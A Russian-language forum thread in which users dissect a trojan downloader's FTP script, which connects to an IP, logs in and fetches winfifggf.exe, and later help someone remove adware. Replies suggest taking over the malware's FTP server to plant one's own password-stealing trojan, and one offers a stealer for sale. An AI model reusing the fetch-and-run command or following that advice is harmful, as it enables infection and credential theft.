Люди! Короче у меня Каспер орёт и пишет что найде Trojan Downloader! Я через каспера нашёл трой и посмотрел из чего он написан! open [Тут IP затем 30294] user 1 1 get winfifggf.exe quit Что этот троян делает? и как можно обратить такой для свойх целей?
Да троян это тебе дают его ты его запускаешь и он с указанного сайта перекидывает трой на твою такчку а потом запускает.
А вот что он тырит с меня этот троян? 30294 чё эти цыфры ознаяают? и как такойже сделать только в свою пользу? Почему так распрашиваю потому что конкретно взялся за дело терь только изучаю виры и трояны! поэтому ного вопросов!
30294 ето пароль на твой компутер! именно его троян и тЫрит! чтобы "обернуть ето себе на пользу" есть два варианта действий 1 - незамедлительный формат C 2 - прекращаешь страдать х***ей прямо сейчас зы: на заметку юным натуралистам за 10вмз предоставлю для исследований прекрасный екземпляр пинчевского сервака. по вопросам оптовой закупки обращаться в приват =)
Мне вообще интересно, как может новичёк выдрать стоко инфы из троя, и при этом не знать, что это значит Это троян-Downloader, те в него встроена лишь фунцция закачки чего-нить. Он лезет в интернет по указанному айпи на указанный порт(30294). Судя по синтаксису запроса, это ФТП-сервер. Трой авторизуется под именем юзера "1" и под паролем "1". Затем скачивает к тебе на комп основного тело трояна "winfifggf.exe". Впринципе, он способен тут же его запустить ФТП-командой "!winfifggf.exe"(кажись, так) Либо через реестр после перезагрузки. Как это можно использовать? Можно зайти на этот ФТП-сервак через какой-нить клиент (например, тотал-командер). Если очень повезёт, у тебя будут прова на запись. Тогда делаешь своего троя и заменяешь родного на своего =] Гы.. И забираешь отчеты с паролями со своего мыла.
У фтп сервера, если читать RFC, видно такие команды USER username PASS password а не USER username password, далее команды GET вообще несуществует, есть RETR и STOR и команды OPEN тоже нет однако, возможно это сценарий для ftp-клиента в Windows (стардартного), но никак не для фтп сервера А вот так, надо хотябы как-то шифровать строки, чтобы их видно небыло в плейнтекст. А не на делфи мучить комп)
Download. Troyan Уважаемые форумчанею. Помогите избавиться от всплывающих окон эксплоера. Гуляя по сайтам, мой антивирус предупреждал меня о "Download. Troyan", но несмотря на это я все-равно открывала странички и закачивала необходимые мне файлы. Теперь каждую минуту ко мне лезет реклама, даже если все окна закрыты. Я проверяла компьютер: Spybot - Search & Destroy Ad-Aware SE Personal Registry Mechanic HijackThis Все они находят проблему, якобы удаляют опасные файлы, но потом оповещают меня о том, что неудалили, т.к. в памяти где то они остались. Ничего не помогает. Я блокировала всплывающие окна, вносила в черный список, удалила все куки, временные файлы и исключения- ничего не помогает. Что мне делать? Адреса всплывающих окон начинаются и заканчиваются на "http://www...................com/normal/yyy102.html"
Насколько я поняла у меня Troyan Look2Me. Вот скриншот http://img218.imageshack.us/img218/5295/44cx.jpg и эта хрюня не удаляется. Он пишет, что удалил, но при повторной выборке, даже после перезагрузки и формате, опять ее находит...
И еще добавлюсь: на скриншоте вы увидите 3 ярлычка слева на рабочем столе с сердечком, самолетом и диском- они вскакивают сами по себе... я их тоже не раз уже удаляла... они как блохи по рабочему столу...
Ну вот, приехали... Тут Троянского Коня по запчастям разбирают..., а у меня Ахиллеас где то безнаказанно прячется...
В общем что бы я зделал, окажись у тебя за компом... Удалил бы каспер, поставил Nod 32 с новыми базами и проверил бы весь комп на вирусы... Если же какие-то жизненно важные файлы для винды оказались бы заражены и не удалялись, снёс бы винду и установил бы новую. p.s. Каспер, internet explorer - полный ацтой... Вместо ie лучше юзай Mozilla Firefox
Винда уже и сама слетела. Поставила все с нуля. Проблем больше нет. А Касперского я и сама не уважаю. У меня сейчас Симантек 2006. А был Нортон 2005.
Возвращаюсь к теме. Сегодня хотела установить скаченного еDonkey снова тот же троян, но успела на корню с помощью Trojan Remover удалить. Вместе с еDonkey . Первый раз тоже было через него же.
Это знаеш чо за тройчик ? это X-control удаленное администратирование у него выходит не плохо...фаервол поставь нормальнвый..касперского выкинь,ставь типа Nod32 и ZoneAlarm новой версии